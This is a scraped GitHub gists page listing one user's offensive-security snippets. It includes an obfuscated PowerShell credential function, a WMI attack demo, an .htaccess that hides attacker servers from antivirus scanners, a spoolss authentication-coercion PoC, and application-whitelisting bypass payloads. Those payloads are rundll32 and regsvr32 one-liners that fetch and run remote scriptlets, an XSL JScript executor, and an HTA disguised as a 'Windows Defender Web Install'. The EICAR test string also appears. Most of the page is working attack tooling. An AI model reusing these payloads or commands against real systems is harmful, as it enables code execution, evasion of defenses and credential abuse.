Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-Lolilolz | |
| { | |
| [CmdletBinding(DefaultParameterSetName="lulzCredz")] | |
| Param( | |
| [Parameter(Position = 0)] | |
| [String[]] | |
| $fe6n2A3qYpaF, | |
| [Parameter(ParameterSetName = "lulzCredz", Position = 1)] |
bik3te
/ WMI_recon_and_attacks.ps1
Created
October 17, 2018 13:07
— forked from mattifestation/WMI_recon_and_attacks.ps1
BlueHat 2016 - WMI recon and attack demo
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ############# | |
| ### SETUP ### | |
| ############# | |
| # Set up remote session | |
| $Credential = Get-Credential TestUser | |
| $AdminCred = Get-Credential Administrator | |
| $SessionOption = New-CimSessionOption -Protocol Dcom | |
| $CimSession = New-CimSession -Credential $Credential -ComputerName TestPC -SessionOption $SessionOption | |
| $AdminCimSession = New-CimSession -Credential $AdminCred -ComputerName TestPC -SessionOption $SessionOption |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* |
bik3te
/ web-servers.md
Created
October 12, 2018 09:09
— forked from willurd/web-servers.md
Big list of http static server one-liners
bik3te
/ .htaccess
Created
October 12, 2018 09:09
— forked from curi0usJack/.htaccess
Drop into your apache working directory to instantly redirect most AV crap elsewhere.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| RewriteEngine On | |
| RewriteOptions Inherit | |
| # Uncomment the below line for verbose logging, including seeing which rule matched. | |
| #LogLevel alert rewrite:trace5 | |
| # BURN AV BURN | |
| # Class A Exclusions. Includes large ranges from Azure & AWS | |
| # Cloudfronted requests by default will have a UA of "Amazon Cloudfront". More info here: https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/header-caching.html#header-caching-web-device |
bik3te
/ dementor.py
Created
October 10, 2018 13:45
— forked from 3xocyte/dementor.py
rough PoC to connect to spoolss to elicit machine account authentication
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample | |
| # some code from https://www.exploit-db.com/exploits/2879/ | |
| import os | |
| import sys | |
| import argparse | |
| import binascii | |
| import ConfigParser |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version='1.0'?> | |
| <stylesheet | |
| xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" | |
| xmlns:user="placeholder" | |
| version="1.0"> | |
| <output method="text"/> | |
| <ms:script implements-prefix="user" language="JScript"> | |
| <![CDATA[ | |
| var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); | |
| ]]> </ms:script> |
bik3te
/ rundll32.sct
Last active
April 26, 2023 04:47
rundll32 javascript:"\..\mshtml,RunHTMLApplication ";a=GetObject('scriptlet:https://<webserver>/rundll32.sct');a.Exec();close;
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| progid="PoC" | |
| classid="{AAA01111-0000-0000-0000-0000FEEDACDC}" > | |
| </registration> | |
| <script language="JScript"> | |
| var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); | |
| </script> | |
| </scriptlet> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> | |
| <html xmlns="http://www.w3.org/1999/xhtml"> | |
| <head> | |
| <meta content="text/html; charset=utf-8" http-equiv="Content-Type" /> | |
| <title>Windows Defender Web Install</title> | |
| <script language="VBScript"> | |
| set oShell = CreateObject("Wscript.Shell") | |
| oShell.Run("C:\\Windows\\System32\\cmd.exe /c calc.exe"),0,true | |
| self.close() | |
| </script> |
bik3te
/ regsvr32.sct
Last active
October 17, 2018 13:21
regsvr32 /u /n /s /i:http://<webserver>/regsvr32.sct scrobj.dll ou regsvr32 /u /n /s /i:\\<webdavserver>\folder\regsvr32.sct scrobj.dll
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="PoC" | |
| progid="PoC" | |
| version="1.00" | |
| classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
| remotable="true" > | |
| <script language="JScript"> |
NewerOlder